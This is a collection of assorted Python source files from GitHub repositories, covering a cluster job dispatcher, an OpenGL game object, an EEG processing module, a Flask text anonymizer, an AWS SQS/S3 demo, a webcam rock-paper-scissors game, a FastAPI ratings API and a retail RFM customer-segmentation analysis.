_send_modules(self):\n with ThreadPoolExecutor() as pool:\n # send the module dependency to each node\n for mod in self._module_d:\n name = _get_module_name(mod)\n source = _get_module_source(mod)\n\n for node in self._nodes:\n pool.submit(node.daemon.add_module, node.id, name, source)\n\n def _setup(self, func):\n with ThreadPoolExecutor() as pool:\n # send the given entry point function to each node\n for node in self._nodes:\n pool.submit(node.daemon.set_entry_point, node.id, func)\n\n def _add_node_to_queue(self, node):\n 
self._node_queue.put(node)\n        self._check_for_jobs()\n\n    def _check_for_jobs(self):\n        if not self._pending_jobs.empty() and not self._node_queue.empty():\n            params = self._pending_jobs.get()\n            node = self._node_queue.get()\n\n            pf = params[0]\n            args = params[1]\n            kwargs = params[2]\n\n            self._execute(pf, node, args, kwargs)\n\n    def _execute(self, pending_future, node, args, kwargs):\n        fut = self.dispatcher.submit(node.daemon.execute, node.id, args=args, kwargs=kwargs)\n\n        # create the callback function to use\n        cal = JobDoneCallable(node, self._add_node_to_queue)\n\n        fut.add_done_callback(cal)\n        pending_future.add_future(fut)\n\n    def execute(self, args=(), kwargs=None):\n        \"\"\"\n        Executes a new job using the given arguments and returns a callable object which\n        returns the result of the job when ready\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        if kwargs is None: kwargs = {}\n\n        # create the callable\n        pf = PendingFuture()\n\n        # add the \"job\" to the pending_jobs\n        args = (pf, args, kwargs)\n        self._pending_jobs.put(args)\n\n        # call check_for_jobs\n        self._check_for_jobs()\n        self._futures.append(pf)\n\n        # return the callable\n        return pf\n\n    def exit(self):\n        \"\"\"\n        Shuts down this Cluster instance and signals all connected nodes that this\n        entry point is no longer being used\n        :return:\n        \"\"\"\n        for node in self._nodes:\n            self.dispatcher.submit(node.daemon.end_id, node.id)\n        self.dispatcher.shutdown(True)\n\n\n","repo_name":"nicholas-recht/PythonCluster","sub_path":"dce.py","file_name":"dce.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45179213020","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# project dependencies\nfrom src.common.opengl_object import OpenGlObject\nfrom src.wall import Cell\n\n# external dependencies\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\n\n@OpenGlObject.register\nclass Projectile:\n\n    def __init__(self, x, y, z, alpha) -> None:\n        self.x = x\n        self.y = y \n        self.z = z\n        self.alpha = alpha\n        self.delete = False\n    \n    def draw(self):\n        if self.z < 50:\n            glPushMatrix()\n            glColor3f(1, 1, 1)\n            glRotatef(self.alpha, 0, 1, 0)\n            glTranslated(self.x, self.y, self.z)\n            glutSolidSphere(0.2, 5, 5)\n            glPopMatrix()\n            self.z += 1\n        else:\n            self.delete = True\n\n    def collision(self, cell: Cell) -> bool:\n        x_dist = abs(self.x - cell.x)\n        y_dist = abs(self.y - cell.y)\n        z_dist = abs(self.z - cell.z)\n\n        return x_dist < 1.2 and y_dist < 1.2 and z_dist < 1.2","repo_name":"henriquekops/Panzer","sub_path":"src/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22359617633","text":"from mapero.core.api import Module\nfrom mapero.core.api import OutputPort, InputPort\nfrom enthought.traits.api import Array, List, Str, Any, HasTraits, Float\nfrom numpy import array, resize\n\nclass registration_metadata(HasTraits):\n    fm = Float\n    channels = List(Str)\n\nclass average_reference_operator(Module):\n    \"\"\" average reference operator \"\"\"\n\n    label = 'Avg Ref Op'\n    \n    ### Input Ports\n    ip_registration_values = InputPort( trait = Array(typecode=float, shape=(None,None)) )\n    ip_registration_electrode_names = InputPort( trait = List(Str) )\n    ip_lead_field = InputPort( trait = Array(typecode=float, shape=(None,None)) )\n    ip_lead_field_electrode_names = InputPort( trait = List(Str) )\n    \n    ### 
Output Ports\n    op_registration_values_avg = OutputPort( trait = Array(typecode=float, shape=(None,None)) )\n    op_registration_metadata = OutputPort( trait = Any )\n    op_lead_field_avg = OutputPort( trait = Array(typecode=float, shape=(None,None))) \n\n    def start_module(self):\n\n        self.i_registration_values = None\n        self.i_registration_electrode_names = None\n        self.i_lead_field = None\n        self.i_lead_field_electrode_names = None\n\n    def execute(self):\n        self.i_registration_values = self.ip_registration_values.data\n        self.i_lead_field = self.ip_lead_field.data\n        self.i_registration_electrode_names = self.ip_registration_electrode_names.data\n        self.i_lead_field_electrode_names = self.ip_lead_field_electrode_names.data\n        if (self.i_registration_values is not None) \\\n            and (self.i_lead_field is not None) \\\n            and (self.i_registration_electrode_names is not None) \\\n            and (self.i_lead_field_electrode_names is not None):\n            self.process()\n\n    def process(self):\n        self.progress = 0\n        i_registration_values = self.i_registration_values\n        i_lead_field = self.i_lead_field\n        i_registration_electrode_names = self.i_registration_electrode_names\n        i_lead_field_electrode_names = self.i_lead_field_electrode_names\n\n        i_reg_cols = i_registration_values.shape[1]\n        i_lead_cols = i_lead_field.shape[1]\n        o_registration_values_avg = array(())\n        o_lead_field_avg = array(())\n        o_registration_metadata = registration_metadata()\n        \n        row_counter = 0\n        reg_row_counter = 0\n        for reg_name in i_registration_electrode_names:\n            lead_row_counter = 0\n            for lead_name in i_lead_field_electrode_names:\n                if reg_name == lead_name:\n                    o_registration_values_avg = resize(o_registration_values_avg, (row_counter+1, i_reg_cols))\n                    o_lead_field_avg = resize(o_lead_field_avg, (row_counter+1, i_lead_cols))\n                    o_registration_values_avg[row_counter] = i_registration_values[reg_row_counter]\n                    o_lead_field_avg[row_counter] = i_lead_field[lead_row_counter]\n                    o_registration_metadata.channels.append(reg_name)\n                    row_counter += 1\n                lead_row_counter += 1\n            reg_row_counter += 1\n\n\n        o_registration_values_avg = \\\n            o_registration_values_avg - o_registration_values_avg.mean(0)\n\n        o_lead_field_avg = \\\n            o_lead_field_avg - o_lead_field_avg.mean(0)\n\n\n        self.op_registration_values_avg.data = o_registration_values_avg\n        self.op_lead_field_avg.data = o_lead_field_avg\n        self.progress = 100\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sherdim/mapero","sub_path":"src/mapero/builtin-modules/modules/InverseSolution/average_reference_operator.py","file_name":"average_reference_operator.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74403027047","text":"import logging\nimport sys\n\nfrom abc import ABC, abstractmethod\n\nfrom sys_line.systems.abstract import System\nfrom sys_line.tools.cli import parse_cli\nfrom sys_line.tools.format import FormatTree\nfrom sys_line.tools.json import json_pretty_string\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass SysLineApp(ABC):\n    \"\"\" Abstract SysLine Application \"\"\"\n\n    def __init__(self, args, options):\n        self.args = args\n        self.options = options\n\n        if self.options.debug:\n            level = logging.DEBUG\n        else:\n            level = logging.INFO\n\n        logging.basicConfig(level=level)\n        LOG.debug(\"command line arguments: %s\", self.args)\n        LOG.debug(\"application options: %s\", self.options)\n\n        self.system = System.create_instance(options)\n\n    @abstractmethod\n    def run(self):\n        \"\"\" Main application action to be implemented by subclasses \"\"\"\n\n    
@staticmethod\n def create_instance(args):\n \"\"\"\n Creates a SysLine application depending on the command line arguments\n \"\"\"\n options = parse_cli(args)\n if options.all is not None:\n fmt = options.output_format\n\n if fmt == \"key_value\":\n return SysLineAllKeyValue(args, options)\n\n if fmt == \"json\":\n return SysLineAllJson(args, options)\n\n err_msg = f\"unknown output format: '{fmt}'\"\n return SysLineError(args, options, err_msg=err_msg, err_code=2)\n\n if options.format:\n return SysLineFormat(args, options)\n return SysLineError(args, options, err_code=2)\n\n\nclass SysLineAll(SysLineApp):\n \"\"\" SysLine application running in 'all' mode \"\"\"\n\n def __init__(self, args, options):\n super(SysLineAll, self).__init__(args, options)\n if not self.options.all:\n self.domains = self.system.SHORT_DOMAINS\n else:\n self.domains = options.all\n\n def run(self):\n self.do_print()\n return 0\n\n @abstractmethod\n def do_print(self):\n \"\"\" Abstract printing method to be implemented by subclasses \"\"\"\n\n\nclass SysLineAllKeyValue(SysLineAll):\n \"\"\"\n A subclass of the SysLine application to print all information in key-pair\n format\n \"\"\"\n\n def do_print(self):\n for domain in self.domains:\n for name, info in self.system.query(domain).all_info():\n print(f\"{domain}.{name}: {info}\")\n\n\nclass SysLineAllJson(SysLineAll):\n \"\"\"\n A subclass of the SysLine application to print all information in json\n format\n \"\"\"\n\n def do_print(self):\n print(json_pretty_string(System.to_json(self.system, self.domains)))\n\n\nclass SysLineFormat(SysLineApp):\n \"\"\"\n A subclass of the SysLine application to print the specified information\n in the user provided format\n \"\"\"\n\n def run(self):\n for fmt in self.options.format:\n print(FormatTree(self.system, fmt).build())\n return 0\n\n\nclass SysLineError(SysLineApp):\n \"\"\"\n A subclass of the SysLine application to return an error code and\n optionally print an error message\n \"\"\"\n\n def __init__(self, args, options, err_msg=\"\", err_code=0):\n super(SysLineError, self).__init__(args, options)\n self.err_msg = err_msg\n self.err_code = err_code\n\n def run(self):\n if self.err_msg:\n LOG.error(self.err_msg)\n return self.err_code\n\n\ndef main():\n \"\"\" Main method \"\"\"\n return SysLineApp.create_instance(sys.argv[1:]).run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"julian-heng/sys-line","sub_path":"sys_line/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39543695407","text":"import logging\nimport urllib.parse\nfrom io import BytesIO\n\nimport requests\nfrom flask import Flask, request, jsonify\nfrom loko_extensions.business.decorators import extract_value_args\nfrom loko_extensions.model.components import Component, save_extensions, Input, Arg\n\nfrom business.anonymizer import Extractor, Anonymizer\nimport fitz\n\nfrom doc.doc import anonymizer_doc\n\napp = Flask(\"anonymization\", static_url_path=\"/web\", static_folder=\"/frontend/dist\")\n\ncomp = Component(\"Anonymizer\", inputs=[Input(\"text\", service=\"anonymize\")], icon=\"RiFileLockLine\",\n args=[Arg(name=\"keep\",\n description=\"Don't anonymize these entity types. One of 'CARDINAL', 'DATE', 'EVENT', 'FAC', 'GPE', 'LANGUAGE', 'LAW', 'LOC', 'MONEY', 'NORP', 'ORDINAL', 'ORG', 'PER', 'PERCENT', 'PRODUCT', 'QUANTITY', 'TIME', 'WORK_OF_ART'. 
Comma separated\"),\n Arg(name=\"entities\", type=\"boolean\", description=\"Returns also extracted entities\")],\n description=anonymizer_doc)\n# extr_comp = Component(\"Ents\")\n# pdf = Component(\"pdf_reader\", inputs=[Input(\"file\", service=\"pdf/text\"), Input(\"url\", service=\"pdf/url\")])\n\nsave_extensions([comp])\n\nextractor = Extractor()\nanonymizer = Anonymizer()\n\n\n@app.route(\"/anonymize\", methods=[\"POST\"])\n@extract_value_args(request)\ndef anonymize(value, args):\n doc = extractor(value)\n keep = args.get(\"keep\")\n if keep:\n keep = [x.strip() for x in keep.split(\",\")]\n out = anonymizer(doc, keep)\n return_entities = args.get(\"entities\")\n if return_entities:\n ents = []\n tokens = [token.text for token in doc]\n\n for e in doc.ents:\n ents.append(dict(label=e.label_, text=e.text, start=e.start, end=e.end))\n\n return jsonify(dict(anonymized_text=\" \".join(out), entities=ents, tokens=tokens))\n return jsonify(\" \".join(out))\n\n@app.route(\"/pdf/url\", methods=[\"POST\"])\n@extract_value_args(request)\ndef pdf_url(value, args):\n value = urllib.parse.unquote(value)\n raw = requests.get(value).content\n buff = BytesIO()\n buff.write(raw)\n buff.seek(0)\n\n doc = fitz.open(\"pdf\", buff)\n text = []\n for page in doc:\n text.append(page.get_text().strip())\n return jsonify(\" \".join(text))\n\nif __name__ == \"__main__\":\n app.run(\"0.0.0.0\", 8080)\n","repo_name":"loko-ai/loko_anonymizer","sub_path":"services/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70404107370","text":"import glob\nimport os\nimport yaml\n\n#-------------------------------------------------------------------------------------------------#\n\ndef getSimulationData():\n\tinput_dir = 'inputfiles/'\n\tsimulationFile = '%ssimulation_starter.yml' %input_dir\n\twith open(simulationFile) as f:\n\t\tSimulationData = yaml.load(f)\n\n\t# adjust the path names with the input directory\n\tSimulationData['atomfile'] = '%s%s' %(input_dir, SimulationData['atomfile'])\n\tSimulationData['atomTypesFile'] = '%s%s' %(input_dir, SimulationData['atomTypesFile'])\n\tSimulationData['bondTypesFile'] = '%s%s' %(input_dir, SimulationData['bondTypesFile'])\n\tSimulationData['angleTypesFile'] = '%s%s' %(input_dir, SimulationData['angleTypesFile'])\n\tSimulationData['dihedralTypesFile'] = '%s%s' %(input_dir, SimulationData['dihedralTypesFile'])\n\tSimulationData['pairPotentialFile'] = '%s%s' %(input_dir, SimulationData['pairPotentialFile'])\n\n\t# create the output directory \n\tsim_dir = SimulationData['sim_dir']\n\tSimulationData['sim_dir'] = MakeDirectory(sim_dir)\n\n\treturn SimulationData\n\n# def GetFileTypes(filename):\n# \tatomTypesFile = glob.glob('inputfiles/*_atomTypes.txt')[0]\n# \t# atomTypesFile = '%s_atomTypes.txt' %filename[:-4]\n# \tbondTypesFile = '%s_bondTypes.txt' %filename[:-4]\n# \tangleTypesFile = '%s_angleTypes.txt' %filename[:-4]\n# \tdihedralTypesFile = '%s_dihedralTypes.txt' %filename[:-4]\n\n# \treturn (atomTypesFile, bondTypesFile,\\\n# \t\t\tangleTypesFile, dihedralTypesFile)\n\n# def MakeResultsDirectory():\n# \t# make nice path slug if spaces are given\n# \tdir_name = 'structure_data/'\n# \t# make the results directory if it dosent exit\n# \tif not os.path.exists(dir_name):\n# \t\tos.makedirs(dir_name)\n# \treturn dir_name\n\ndef MakeDirectory(sim_name):\n\t# make nice path slug if spaces are given\n\tslug_list = 
sim_name.strip().split()\n\tslug = ''\n\tfor item in slug_list:\n\t\tslug += '{}_'.format(item)\n\t# replace the last _ with /\n\tslug = slug[:-1]+'/'\n\n\t# make the top directory if it doesn't exist\n\tif not os.path.exists(slug):\n\t\tos.makedirs(slug)\n\n\treturn slug","repo_name":"joeburg/phd-research","sub_path":"LAMMPS_simulation_starter/General_model_starter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1032528295","text":"import random\nimport time\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\n\nmodel = load_model('keras_model.h5')\ncap = cv2.VideoCapture(0)\ndata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\noptions = ['rock', 'paper', 'scissors']\n\nclass rps:\n    def __init__(self, options, computer_wins = 0, user_wins = 0):\n        self.options = options\n        self.computer_wins = computer_wins\n        self.user_wins = user_wins\n\n    def get_prediction(self):\n\n        start = time.time()\n\n        while True: \n            \n            ret, frame = cap.read()\n            resized_frame = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n            image_np = np.array(resized_frame)\n            normalized_image = (image_np.astype(np.float32) / 127.0) - 1 # Normalize the image\n            data[0] = normalized_image\n            prediction = model.predict(data)\n            cv2.imshow('frame', frame)\n            # Press q to close the window\n            # print(prediction)    \n            self.user_choice = np.argmax(prediction[0])\n            # print(user_choice)      \n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n\n            end = time.time()\n            countdown = end - start\n            if countdown > 4:\n                print(countdown)\n                break\n            \n\n\n        return self.user_choice\n\n    def get_computer_choice(self):\n        self.computer_choice = random.choice(options)\n        return self.computer_choice\n\n\n    def get_winner(self):\n\n        print('computer played {}'.format(self.computer_choice))\n\n\n        if self.user_choice == 0 : \n            print('You played rock')\n            if self.computer_choice == 'rock':\n                print('It is a tie!')\n            elif self.computer_choice == 'scissors':\n                print('You win this round!')\n                self.user_wins = self.user_wins + 1  \n            elif self.computer_choice == 'paper':\n                print('You lose this round!')\n                self.computer_wins = self.computer_wins + 1\n\n        elif self.user_choice == 1 :\n            print('You played paper')\n            if self.computer_choice == 'rock':\n                print('You win this round!')\n                self.user_wins = self.user_wins + 1\n            elif self.computer_choice == 'scissors':\n                print('You lose this round!')\n                self.computer_wins = self.computer_wins + 1\n            elif self.computer_choice == 'paper':\n                print('It is a tie!')\n\n        elif self.user_choice == 2 :\n            print('You played scissors')\n            if self.computer_choice == 'paper':\n                print('You win this round!')\n                self.user_wins = self.user_wins + 1\n            elif self.computer_choice == 'rock':\n                print('You lose this round!')\n                self.computer_wins = self.computer_wins + 1\n            elif self.computer_choice == 'scissors':\n                print('It is a tie!')\n\n        elif self.user_choice == 3:\n            print('Camera did not recognise input. 
Please try again!')\n\n        return self.computer_wins, self.user_wins\n\n\ndef play(options):\n    game = rps(options, computer_wins = 0, user_wins = 0)\n    while True:\n        if game.user_wins < 3 and game.computer_wins < 3:\n            game.get_prediction()\n            game.get_computer_choice()\n            game.get_winner()\n            print(game.computer_wins, game.user_wins)\n        elif game.user_wins == 3:\n            print('Congratulations, you won the game!')\n            break\n        elif game.computer_wins == 3:\n            print('Sorry, you lost the game!')\n            break\n\n\nplay(options)\ncap.release()\ncv2.destroyAllWindows()  \n\n\n","repo_name":"leojohnson293/computer-vision-rock-paper-scissors","sub_path":"class_camera_rps.py","file_name":"class_camera_rps.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28784712225","text":"from typing import Optional, List, Annotated\nfrom fastapi import FastAPI, Path, Query, Depends, APIRouter, HTTPException\nfrom pydantic import BaseModel\nimport models\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter()\n\ndef get_db():\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\ndb_dependency = Annotated[Session, Depends(get_db)]\nclass RatingsBase(BaseModel):\n    book_id: int\n    user_name: str\n    rating: int\n    review_text: str\n\n@router.post(\"/ratings\")\nasync def add_new_rating(review: RatingsBase, db: db_dependency):\n    if not(1 <= review.rating <= 5):\n        raise HTTPException(status_code=400, detail='Invalid Rating')\n    result = db.query(models.Ratings.user_name).all()\n    for user in result:\n        print(user)\n        if review.user_name == user[0]:\n            raise HTTPException(status_code=400, detail='User already submitted rating')\n    try:\n        db_rating = models.Ratings(book_id = review.book_id, user_name = review.user_name, \n                                   rating = review.rating, review_text = review.review_text)\n        db.add(db_rating)\n        db.commit()\n        db.refresh(db_rating)\n        return {\"message\":\"Rating added successfully\"}\n    except:\n        raise HTTPException(status_code=404, detail='Invalid Book id')\n\n@router.get(\"/ratings/{book_id}\")\nasync def all_ratings_of_book_id(book_id:int, db: db_dependency):\n    result = db.query(models.Ratings).filter(models.Ratings.book_id == book_id).all()\n    if not result:\n        raise HTTPException(status_code=404, detail='Book is not found!')\n    return result\n","repo_name":"Parth132/online_bookstore_using-_FastAPI","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25896652794","text":"#!/usr/bin/env python\n\nimport boto\nfrom boto.sqs.message import Message\nimport time\nimport signal\nimport sys\nimport os\nimport logging\n\n\"\"\" Simple 'hello world' to connect to AWS services.\n    - Connect to SQS\n    - create a queue if it doesn't exist\n    - send a message\n    - receive a message\n    - store the value in S3\n\"\"\"\n\nif \"DEBUG_LOGGING\" in os.environ:\n    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nelse:\n    logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\nlogger = logging.getLogger('aws_demo')\n\n\ndef get_sqs_queue():\n    \"\"\" Return an SQS Queue object, creating the queue if needed \"\"\"\n    args = {}\n\n    if \"SQS_SECURE\" in os.environ:\n        args['is_secure'] = False if \\\n            os.environ[\"SQS_SECURE\"] == \"False\" else True\n\n    if \"SQS_PORT\" in os.environ:\n        args['port'] = os.environ[\"SQS_PORT\"]\n\n    region = 
os.environ.get('SQS_REGION', 'us-west-2')\n queue = os.environ.get('SQS_QUEUE_NAME')\n conn = boto.sqs.connect_to_region(region, **args)\n\n if queue not in [str(q.name) for q in conn.get_all_queues()]:\n conn.create_queue(queue)\n\n return conn.lookup(queue)\n\n\ndef get_s3_key(path=\"hello.txt\"):\n \"\"\" Return a key handle at the appropriate S3 bucket and path \"\"\"\n\n bucket = os.environ['S3_BUCKET_NAME']\n\n c = boto.connect_s3()\n try:\n b = c.get_bucket(bucket)\n except boto.exception.S3ResponseError:\n c.create_bucket(bucket)\n b = c.get_bucket(bucket)\n\n k = boto.s3.key.Key(b)\n k.key = path\n return k\n\n\ndef hello_aws_world(queue, key):\n\n logger.info(\"Sending message\")\n\n m = Message()\n m.set_body(\"Hello World!\")\n queue.write(m)\n\n logger.info(\"Receive the message\")\n\n res = queue.get_messages(1)\n rec_m = res.pop()\n rec_body = rec_m.get_body()\n queue.delete_message(rec_m)\n\n logger.info(\"Got message <{}>\".format(rec_body))\n\n key.set_contents_from_string(rec_body)\n\n logger.info(\"Storing contents into s3 at {}\".format(key.key))\n\n\ndef main():\n signal.signal(signal.SIGTERM, sigterm_handler)\n queue = get_sqs_queue()\n key = get_s3_key()\n\n while True:\n hello_aws_world(queue, key)\n time.sleep(2)\n\n\ndef sigterm_handler(signal, frame):\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbarratt/docker-compose-fake-aws","sub_path":"democontainer/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"13227366118","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 1 13:29:55 2021\r\n\r\n@author: sneha\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas_profiling\r\nimport scipy\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport datetime as dt\r\ndata = pd.read_csv('C:/Users/sneha/Desktop/masters/project/online retail/online_retail.csv',encoding = 'unicode_escape')\r\ndata.columns = ['Invoice', 'StockCode', 'Description', 'Quantity', 'InvoiceDate','Price','Customer ID','Country']\r\ndata.info()\r\ndata.head()\r\ndata.describe()\r\n\r\ndata.corr()\r\nsns.heatmap(data.corr())\r\ndata.shape\r\n\r\n\r\ndf = data.copy()\r\n#df.columns = ['Invoice', 'StockCode', 'Description', 'Quantity', 'InvoiceDate','Price','Customer_id','Country']\r\ndf.head()\r\n\r\n\r\ndata1 = data[['Country','Customer ID']].drop_duplicates()\r\n\r\ndata1.groupby(['Country'])['Customer ID'].aggregate('count').reset_index().sort_values('Customer ID', ascending = False)\r\n\r\ndf = data.query(\"Country == 'United Kingdom'\").reset_index(drop=True)\r\ndf.head()\r\ndf.info()\r\n#df.rename(columns = {0 :'InvoiceNo'}, inplace = True)\r\ndf.info()\r\n# data cleaning \r\ndf['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n\r\n# checking if missing values are present in the dataset\r\ndf.isnull().sum()\r\ndf.describe()\r\n\r\ndf = df[pd.notnull(df['Customer ID'])]\r\ndf.shape\r\n# removing outliers from the dataset\r\ndf = df[df.Quantity > 0]\r\n\r\nsns.boxplot(x=df[\"Quantity\"])\r\ndf = df[df.Quantity < 8000 ]\r\nsns.boxplot(x=df[\"Quantity\"])\r\ndf = df[df.Price < 8000 ]\r\nsns.boxplot(x=df[\"Price\"])\r\ndf.shape\r\n\r\n\r\n# calculating total price of the item \r\n\r\ndf['totalPrice'] = 
df['Quantity'] * df['Price']\r\n\r\n\r\n#Calculating the RFM values \r\n#Recency = Latest Date - Last Inovice Data, Frequency = count of invoice no. of transaction(s), Monetary = Sum of Total \r\n\r\nrecent = dt.datetime(2011,12,10)\r\n#Set Latest date 2011-12-10 as last invoice date was 2011-12-09. This is to calculate the number of days from recent purchase\r\n#Latest_Date = dt.datetime(2011,12,10)\r\n\r\nscore = df.groupby('Customer ID').agg({'InvoiceDate' : lambda x :(recent - x.max()).days,\r\n 'Invoice': lambda x: len(x),\r\n 'totalPrice' : lambda x:x.sum()})\r\n\r\n#Convert Invoice Date into type int\r\nscore['InvoiceDate'] = score['InvoiceDate'].astype(int)\r\n\r\nscore.rename(columns={'InvoiceDate': 'Recency', \r\n 'Invoice': 'Frequency', \r\n 'totalPrice': 'Monetary'}, inplace=True)\r\n\r\nscore.reset_index().head()\r\nscore.describe()\r\n\r\n# checking the distribution and skewness of RFM values\r\np = score['Recency']\r\nax = sns.displot(p)\r\np1 =score.query('Frequency <1000')['Frequency']\r\nax = sns.displot(p1)\r\np2 = score.query('Monetary < 10000')['Monetary']\r\nax = sns.displot(p2)\r\n\r\n#Splitting the segments\r\nq1 = score.quantile(q=[0.2, 0.4, 0.6, 0.8])\r\nq1 = q1.to_dict()\r\n\r\ndef r_score(x):\r\n if x <= q1['Recency'][0.2]:\r\n return 5\r\n elif x <= q1['Recency'][0.4]:\r\n return 4\r\n elif x <= q1['Recency'][0.6]:\r\n return 3\r\n elif x <= q1['Recency'][0.8]:\r\n return 2\r\n else:\r\n return 1\r\n\r\ndef fm_score(x, c):\r\n if x <= q1[c][0.2]:\r\n return 1\r\n elif x <= q1[c][0.4]:\r\n return 2\r\n elif x <= q1[c][0.6]:\r\n return 3\r\n elif x <= q1[c][0.8]:\r\n return 4\r\n else:\r\n return 5 \r\n \r\n \r\nscore['R'] = score['Recency'].apply(lambda x: r_score(x))\r\nscore['F'] = score['Frequency'].apply(lambda x: fm_score(x, 'Frequency'))\r\nscore['M'] = score['Monetary'].apply(lambda x: fm_score(x, 'Monetary'))\r\n\r\n#Calculate and Add RFMGroup value column showing combined concatenated score of RFM\r\nscore['RFM_Score'] = score.R.map(str) + score.F.map(str) + score.M.map(str)\r\n\r\n\r\nmap = {\r\n r'[1-2][1-2]': 'Hibernating',\r\n r'[1-2][3-4]': 'At Risk',\r\n r'[1-2]5': 'Can\\'t loose',\r\n r'3[1-2]': 'About to sleep',\r\n r'33': 'Need attention',\r\n r'[3-4][4-5]': 'loyal customers',\r\n r'41': 'Promising',\r\n r'51': 'New customers',\r\n r'[4-5][2-3]': 'Potential loyalists',\r\n r'5[4-5]': 'Champions'\r\n}\r\n\r\nscore['Loyalty_level'] = score['R'].map(str) + score['F'].map(str)\r\nscore['Loyalty_level'] = score['Loyalty_level'].replace(map, regex=True)\r\n\r\n\r\n# counting number of customers for each loyalty level\r\n\r\ncount = score['Loyalty_level'].value_counts().sort_values(ascending = True)\r\n\r\nfig, ax = plt.subplots()\r\n\r\nbars = ax.barh(range(len(count)),count,color='lightcoral')\r\nax.set_frame_on(False)\r\nax.tick_params(left=False,\r\n bottom=False,\r\n labelbottom=False)\r\nax.set_yticks(range(len(count)))\r\nax.set_yticklabels(count.index)\r\n\r\nfor i, bar in enumerate(bars):\r\n value = bar.get_width()\r\n \r\n ax.text(value,\r\n bar.get_y() + bar.get_height()/2,\r\n '{:,} ({:}%)'.format(int(value),\r\n int(value*100/count.sum())),\r\n va='center',\r\n ha='left'\r\n )\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# normalizing data before applying machine learning algorithm\r\n\r\n\r\ndef z(n):\r\n if n <= 0:\r\n return 1\r\n else:\r\n return n\r\n\r\nscore['Recency'] = [z(x) for x in score.Recency]\r\nscore['Monetary'] = [z(x) for x in score.Monetary]\r\nlog = score[['Recency','Frequency','Monetary']].apply(np.log,axis = 
1).round(3)\r\n\r\n\r\n\r\nsc = StandardScaler()\r\nfinal_data = sc.fit_transform(log)\r\nfinal_data = pd.DataFrame(final_data, index = score.index, columns = log.columns)\r\n\r\n\r\n# # determining optimal k value using elbow method\r\nerr = {}\r\nfor i in range(1,20):\r\n    model = KMeans(n_clusters= i, init= 'k-means++', max_iter= 1000)\r\n    model.fit(final_data)\r\n    err[i] = model.inertia_\r\n\r\n\r\nplt.figure(figsize=(12, 6))\r\nsns.pointplot(x = list(err.keys()), y = list(err.values()))\r\nplt.title('Finding optimal k value for clusters')\r\nplt.xlabel('K Value')\r\nplt.ylabel('Inertia')\r\n\r\nKm_model = KMeans(n_clusters= 3, init= 'k-means++', max_iter= 2000)\r\nKm_model.fit(final_data)\r\n#Find the clusters for the observation given in the dataset\r\nscore['Cluster'] = Km_model.labels_\r\nscore.head()\r\n\r\n\r\n\r\nplt.figure(figsize=(12,6))\r\n\r\n##Scatter Plot Frequency Vs Recency\r\nColors = [\"red\", \"green\", \"blue\"]\r\nscore['Color'] = score['Cluster'].map(lambda p: Colors[p])\r\nax = score.plot(    \r\n    kind=\"scatter\", \r\n    x=\"Recency\", y=\"Frequency\",\r\n    figsize=(10,8),\r\n    c = score['Color']\r\n)\r\n\r\n\r\n# # Create a cluster label column in the original DataFrame\r\n# cluster_labels = Km_model.labels_\r\n# temp = score[['Recency','Frequency','Monetary']]\r\n# temp1 = final_data.assign(Cluster = cluster_labels)\r\n# temp2 = temp.assign(Cluster = cluster_labels)\r\n\r\n# # Calculate average RFM values and size for each cluster\r\n# summary_k4 = temp2.groupby(['Cluster']).agg({'Recency': 'mean',\r\n#                                             'Frequency': 'mean',\r\n#                                             'Monetary': ['mean', 'count'],}).round(0)\r\n\r\n\r\n# cluster_avg = temp2.groupby(['Cluster']).mean()\r\n# population_avg = temp.head().mean()\r\n# relative_imp = cluster_avg / population_avg - 1\r\n# 